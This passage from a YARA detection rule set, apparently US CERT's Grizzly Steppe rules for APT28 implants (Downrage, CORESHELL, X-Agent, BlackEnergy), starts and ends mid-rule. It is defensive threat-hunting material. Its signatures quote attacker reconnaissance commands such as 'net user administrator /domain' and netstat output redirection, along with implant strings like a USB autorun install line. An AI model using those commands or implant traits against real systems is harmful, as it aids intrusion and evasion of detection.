44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49, 7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c, 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9" author = "Florian Roth" reference = "https://goo.gl/urp4CD" date = "2017-01-25" super_rule = 1 hash1 = "308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f" hash2 = "44bdf5266b45185b6824898664fd0c0f2039cdcb48b390f150e71345cd867c49" hash3 = "7f16824e7ad9ee1ad2debca2a22413cde08f02ee9f0d08d64eb4cb318538be9c" hash4 = "82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9" strings: $x1 = "cmd /u /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter" fullword ascii $x2 = "cmd /a /c net user administrator /domain >>" fullword ascii $x3 = "cmd /a /c netstat -ant >>\"%localappdata%\\Microsoft\\" fullword ascii $o1 = "========================== (Net User) ==========================" ascii fullword condition: filesize < 2000KB and ( ( uint16(0) == 0x5a4d and 1 of them ) or $o1 ) } /* Yara Rule Set Author: US CERT Date: 2017-02-10 Identifier: US CERT Report on Grizzly Steppe - APT28/APT29 */ import "pe" /* Rule Set ----------------------------------------------------------------- */ rule IMPLANT_1_v1 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {6A ?? E8 ?? ?? FF FF 59 85 C0 74 0B 8B C8 E8 ?? ?? FF FF 8B F0 EB 02 33 F6 8B CE E8 ?? ?? FF FF 85 F6 74 0E 8B CE E8 ?? ?? FF FF 56 E8 ?? ?? FF FF 59} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_1_v2 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {83 3E 00 53 74 4F 8B 46 04 85 C0 74 48 83 C0 02 50 E8 ?? ?? 00 00 8B D8 59 85 DB 74 38 8B 4E 04 83 F9 FF 7E 21 57 } $STR2 = {55 8B EC 8B 45 08 3B 41 08 72 04 32 C0 EB 1B 8B 49 04 8B 04 81 80 78 19 01 75 0D FF 70 10 FF [5] 85 C0 74 E3 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_1_v3 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $rol7encode = { 0F B7 C9 C1 C0 07 83 C2 02 33 C1 0F B7 0A 47 66 85 C9 75 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_1_v4 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_LOOP = { 8B 45 FC 8D 0C 06 33 D2 6A 0B 8B C6 5B F7 F3 8A 82 ?? ?? ?? ?? 32 04 0F 46 88 01 3B 75 0C 7C E0 } condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_1_v5 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $drivername = { 6A 30 ?? 6A 33 [5] 6A 37 [5] 6A 32 [5] 6A 31 [5] 6A 77 [5] 6A 69 [5] 6A 6E [5] 6A 2E [5] 6A 73 [5-9] 6A 79 [5] 6A 73 } $mutexname = { C7 45 ?? 2F 2F 64 66 C7 45 ?? 63 30 31 65 C7 45 ?? 6C 6C 36 7A C7 45 ?? 73 71 33 2D C7 45 ?? 75 66 68 68 66 C7 45 ?? 66 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } /* TOO MANY FALSE POSITIVES rule IMPLANT_1_v6 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XORopcodes_eax = { 35 (22 07 15 0e|56 d7 a7 0a) } $XORopcodes_others = { 81 (F1|F2|F3|F4|F5|F6|F7) (22 07 15 0E|56 D7 A7 0A) } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025) and any of them } */ rule IMPLANT_1_v7 { meta: description = "Downrage Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_FUNCT = { C7 45 ?? ?? ?? 00 10 8B 0E 6A ?? FF 75 ?? E8 ?? ?? FF FF } condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v1 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8d ?? fa [2] e8 [2] FF FF C7 [2-5] 00 00 00 00 8D [2-5] 5? 6a 00 6a 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v2 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v3 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {C1 EB 07 8D ?? 01 32 1C ?? 33 D2 } $STR2 = {2B ?? 83 ?? 06 0F 83 ?? 00 00 00 EB 02 33 } $STR3 = {89 ?? ?? 89 ?? ?? 89 55 ?? 89 45 ?? 3B ?? 0F 83 ?? 00 00 00 8D ?? ?? 8D ?? ?? FE } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v4 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v5 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v6 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { e8 [2] ff ff 8b [0-6] 00 04 00 00 7F ?? [1-2] 00 02 00 00 7F ?? [1-2] 00 01 00 00 7F ?? [1-2] 80 00 00 00 7F ?? 83 ?? 40 7F} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v7 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $s1 = {10 A0 FA FD 83 3D 28 D4 1F FF 77 5? ?8 B4 50 CC 1E B0 78 D7 90 13 21 C0 23 3D 28 BC 78 95 DE 4B B0 60 00 00 0F 7F 38 B4 50 C8 D5 9F E0 25 DF F3 21 C0 28 BC 13 3D 2B 90 60 00 00 0F 7F 18 B4 50 C8 BC F2 21 C0 28 B4 5E 48 B5 5E 00 8D 41 FE 83 F8 06 8B 45 ?? 72 ?? 8B 4D ?? 8B } $s2 = {28 D9 B0 00 00 00 00 FB 65 C0 AF E8 D3 40 28 B4 5? ?0 3C 20 FA FD 88 D7 A0 18 D4 2F F3 3D 2F 77 5? ?C 1E B0 78 BC 73 21 C0 A3 3D 2B 90 60 00 00 0F 7F 18 A4 D? ?8 B4 50 C8 0E 90 20 24 D? ?3 20 C0 28 B4 5? ?3 3D 2F 77 5? ?8 B4 50 C2 20 C0 28 BD 70 2D 93 01 E8 B4 D0 C8 D4 2F E3 B4 5E 88 B4 5? ?8 95 5? ?7 2A 05 F5 E5 B8 BE 55 DC 20 80 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v8 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 } $STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 } $STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA } $STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v9 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8A C3 02 C0 02 D8 8B 45 F8 02 DB 83 C1 02 03 45 08 88 5D 0F 89 45 E8 8B FF 0F B6 5C 0E FE 8B 45 F8 03 C1 0F AF D8 8D 51 01 89 55 F4 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 F4 C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 0F 2C 02 32 04 32 33 D2 88 45 FF 8B C1 8B F7 F7 F6 8A 45 FF 8B 75 14 22 04 32 02 D8 8B 45 E8 30 1C 08 8B 4D F4 8D 51 FE 3B D7 72 A4 8B 45 E4 8B 7D E0 8B 5D F0 83 45 F8 06 43 89 5D F0 3B D8 0F 82 ?? ?? ?? ?? 3B DF 75 13 8D 04 7F 8B 7D 10 03 C0 2B F8 EB 09 33 C9 E9 5B FF FF FF 33 FF 3B 7D EC 0F 83 ?? ?? ?? ?? 8B 55 08 8A CB 02 C9 8D 04 19 02 C0 88 45 13 8D 04 5B 03 C0 8D 54 10 FE 89 45 E0 8D 4F 02 89 55 E4 EB 09 8D 9B 00 00 00 00 8B 45 E0 0F B6 5C 31 FE 8D 44 01 FE 0F AF D8 8D 51 01 89 55 0C 33 D2 BF 06 00 00 00 8D 41 FF F7 F7 8B 45 0C C1 EB 07 32 1C 32 33 D2 F7 F7 8A C1 02 45 13 2C 02 32 04 32 33 D2 88 45 0B 8B C1 8B F7 F7 F6 8A 45 0B 8B 75 14 22 04 32 02 D8 8B 45 E4 30 1C 01 8B 4D 0C } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v10 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v11 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8b ec 6a fe 68 [4] 68 [4] 64 A1 00 00 00 00 50 83 EC 0C 53 56 57 A1 [4] 31 45 F8 33 C5 50 8D 45 F0 64 A3 00 00 00 00 [8-14] 68 [4] 6a 01 [1-2] FF 15 [4] FF 15 [4] 3D B7 00 00 00 75 27} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v12 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {48 83 [2] 48 89 [3] c7 44 [6] 4c 8d 05 [3] 00 BA 01 00 00 00 33 C9 ff 15 [2] 00 00 ff 15 [2] 00 00 3D B7 00 00 00 75 ?? 48 8D 15 ?? 00 00 00 48 8B CC E8} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v13 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 83 ?? 06 [7-17] fa [0-10] 45 [2-4] 48 [2-4] e8 [2] FF FF [6-8] 48 8d [3] 48 89 [3] 45 [2] 4? [1-2] 01} condition: (uint16(0) == 0x5A4D) and all of them } rule IMPLANT_2_v14 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {8B ?? 44 89 44 24 60 41 F7 E0 8B F2 B8 AB AA AA AA C1 EE 02 89 74 24 58 44 8B ?? 41 F7 ?? 8B CA BA 03 00 00 00 C1 E9 02 89 0C 24 8D 04 49 03 C0 44 2B ?? 44 89 ?? 24 04 3B F1 0F 83 ?? 01 00 00 8D 1C 76 4C 89 6C 24 } $STR2 = {C5 41 F7 E0 ?? ?? ?? ?? ?? ?? 8D 0C 52 03 C9 2B C1 8B C8 ?? 8D 04 ?? 46 0F B6 0C ?? 40 02 C7 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA 46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 8B C1 } $STR3 = {41 F7 E0 C1 EA 02 41 8B C0 8D 0C 52 03 C9 2B C1 8B C8 42 8D 04 1B 46 0F B6 0C ?? 40 02 C6 41 8D 48 FF 44 32 C8 B8 AB AA AA AA F7 E1 C1 EA 02 8D 04 52 03 C0 2B C8 B8 AB AA AA AA } $STR4 = {46 22 0C ?? 41 8D 48 FE F7 E1 C1 EA 02 8D 04 52 8B 54 24 58 03 C0 2B C8 8B C1 0F B6 4F FF 42 0F B6 04 ?? 41 0F AF CB C1 } condition: (uint16(0) == 0x5A4D) and any of them } rule IMPLANT_2_v15 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $XOR_LOOP1 = { 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 } $XOR_LOOP2 = { 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 } $XOR_LOOP3 = { 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v16 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $OBF_FUNCT = { 0F B6 1C 0B 8D 34 08 8D 04 0A 0F AF D8 33 D2 8D 41 FF F7 75 F8 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D F0 8D 41 FE 83 F8 06 8B 45 DC 72 9A } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and $OBF_FUNCT } rule IMPLANT_2_v17 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 24108b44241c894424148b4424246836 } $STR2 = { 518d4ddc516a018bd08b4de4e8360400 } $STR3 = { e48178061591df75740433f6eb1a8b48 } $STR4 = { 33d2f775f88b45d402d903c641321c3a } $STR5 = { 006a0056ffd083f8ff74646a008d45f8 } condition: (uint16(0) == 0x5A4D) and 2 of them } rule IMPLANT_2_v18 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = { 8A C1 02 C0 8D 1C 08 8B 45 F8 02 DB 8D 4A 02 8B 55 0C 88 5D FF 8B 5D EC 83 C2 FE 03 D8 89 55 E0 89 5D DC 8D 49 00 03 C1 8D 34 0B 0F B6 1C 0A 0F AF D8 33 D2 8D 41 FF F7 75 F4 8B 45 0C C1 EB 07 8D 79 01 32 1C 02 33 D2 8B C7 89 5D E4 BB 06 00 00 00 F7 F3 8B 45 0C 8D 59 FE 02 5D FF 32 1C 02 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B 45 0C 8B CF 22 1C 02 8B 45 E4 8B 55 E0 02 C3 30 06 8B 5D DC 8D 41 FE 83 F8 06 8B 45 F8 72 9B 8B 4D F0 8B 5D D8 8B 7D 08 8B F0 41 83 C6 06 89 4D F0 89 75 F8 3B 4D D4 0F 82 ?? ?? ?? ?? 8B 55 E8 3B CB 75 09 8D 04 5B 03 C0 2B F8 EB 02 33 FF 3B FA 0F 83 ?? ?? ?? ?? 8B 5D EC 8A C1 02 C0 83 C3 FE 8D 14 08 8D 04 49 02 D2 03 C0 88 55 0B 8D 48 FE 8D 57 02 03 C3 89 4D D4 8B 4D 0C 89 55 F8 89 45 D8 EB 06 8D 9B 00 00 00 00 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_2_v19 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $obfuscated_RSA1 = { 7C 41 B4 DB ED B0 B8 47 F1 9C A1 49 B6 57 A6 CC D6 74 B5 52 12 4D FC B1 B6 3B 85 73 DF AB 74 C9 25 D8 3C EA AE 8F 5E D2 E3 7B 1E B8 09 3C AF 76 A1 38 56 76 BB A0 63 B6 9E 5D 86 E4 EC B0 DC 89 1E FA 4A E5 79 81 3F DB 56 63 1B 08 0C BF DC FC 75 19 3E 1F B3 EE 9D 4C 17 8B 16 9D 99 C3 0C 89 06 BB F1 72 46 7E F4 0B F6 CB B9 C2 11 BE 5E 27 94 5D 6D C0 9A 28 F2 2F FB EE 8D 82 C7 0F 58 51 03 BF 6A 8D CD 99 F8 04 D6 F7 F7 88 0E 51 88 B4 E1 A9 A4 3B } $cleartext_RSA1 = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 04 00 00 01 00 01 00 AF BD 26 C9 04 65 45 9F 0E 3F C4 A8 9A 18 C8 92 00 B2 CC 6E 0F 2F B2 71 90 FC 70 2E 0A F0 CA AA 5D F4 CA 7A 75 8D 5F 9C 4B 67 32 45 CE 6E 2F 16 3C F1 8C 42 35 9C 53 64 A7 4A BD FA 32 99 90 E6 AC EC C7 30 B2 9E 0B 90 F8 B2 94 90 1D 52 B5 2F F9 8B E2 E6 C5 9A 0A 1B 05 42 68 6A 3E 88 7F 38 97 49 5F F6 EB ED 9D EF 63 FA 56 56 0C 7E ED 14 81 3A 1D B9 A8 02 BD 3A E6 E0 FA 4D A9 07 5B E6 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_2_v20 { meta: description = "CORESHELL/SOURFACE Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $func = { 0F B6 5C 0A FE 8D 34 02 8B 45 D4 03 C2 0F AF D8 8D 7A 01 8D 42 FF 33 D2 F7 75 F4 C1 EB 07 8B C7 32 1C 0A 33 D2 B9 06 00 00 00 F7 F1 8A 4D F8 8B 45 0C 80 E9 02 02 4D 0B 32 0C 02 8B 45 F8 33 D2 F7 75 F4 8B 45 0C 22 0C 02 8B D7 02 D9 30 1E 8B 4D 0C 8D 42 FE 3B 45 E8 8B 45 D8 89 55 F8 72 A0 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } rule IMPLANT_3_v1 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = ">process isn't exist<" ascii wide $STR2 = "shell\\open\\command=\"System Volume Information\\USBGuard.exe\" install" ascii wide $STR3 = "User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" ascii wide $STR4 = "webhp?rel=psy&hl=7&ai=" ascii wide $STR5 = {0f b6 14 31 88 55 ?? 33 d2 8b c1 f7 75 ?? 8b 45 ?? 41 0f b6 14 02 8a 45 ?? 03 fa} condition: any of them } rule IMPLANT_3_v2 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $base_key_moved = {C7 45 ?? 3B C6 73 0F C7 45 ?? 8B 07 85 C0 C7 45 ?? 74 02 FF D0 C7 45 ?? 83 C7 04 3B C7 45 ?? FE 72 F1 5F C7 45 ?? 5E C3 8B FF C7 45 ?? 56 B8 D8 78 C7 45 ?? 75 07 50 E8 C7 45 ?? B1 D1 FF FF C7 45 ?? 59 5D C3 8B C7 45 ?? FF 55 8B EC C7 45 ?? 83 EC 10 A1 66 C7 45 ?? 33 35} $base_key_b_array = {3B C6 73 0F 8B 07 85 C0 74 02 FF D0 83 C7 04 3B FE 72 F1 5F 5E C3 8B FF 56 B8 D8 78 75 07 50 E8 B1 D1 FF FF 59 5D C3 8B FF 55 8B EC 83 EC 10 A1 33 35 } condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_3_v3 { meta: description = "X-Agent/CHOPSTICK Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = ".?AVAgentKernel@@" $STR2 = ".?AVIAgentModule@@" $STR3 = "AgentKernel" condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and any of them } rule IMPLANT_4_v1 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $STR1 = {55 8B EC 81 EC 54 01 00 00 83 65 D4 00 C6 45 D8 61 C6 45 D9 64 C6 45 DA 76 C6 45 DB 61 C6 45 DC 70 C6 45 DD 69 C6 45 DE 33 C6 45 DF 32 C6 45 E0 2EE9 ?? ?? ?? ??} $STR2 = {C7 45 EC 5A 00 00 00 C7 45 E0 46 00 00 00 C7 45 E8 5A 00 00 00 C7 45 E4 46 00 00 00} condition: (uint16(0)== 0x5A4D or uint16(0) == 0xCFD0 or uint16(0)== 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 1 of them } rule IMPLANT_4_v2 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $BUILD_USER32 = {75 73 65 72 ?? ?? ?? 33 32 2E 64} $BUILD_ADVAPI32 = {61 64 76 61 ?? ?? ?? 70 69 33 32} $CONSTANT = {26 80 AC C8} condition: (uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them } /* Some false positives - replaced with alternative rule (see below) rule IMPLANT_4_v3 { meta: description = "BlackEnergy / Voodoo Bear Implant by APT28" author = "US CERT" reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE" date = "2017-02-10" score = 85 strings: $a1 = "Adobe Flash Player Installer" wide nocase $a3 = "regedt32.exe" wide nocase $a4 = "WindowsSysUtility" wide nocase $a6 = "USB MDM Driver" wide nocase $b1 = {00 05 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15 28 0A 3F 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5C 04 00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 1C 02 00 00 01 00 30 00 30 00 31 00 35 00 30 00 34 00 62 00 30 00 00 00 4C 00 16 00 01 00 43 00 6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 46 00 0F 00 01 00 46 00 69 00 6C 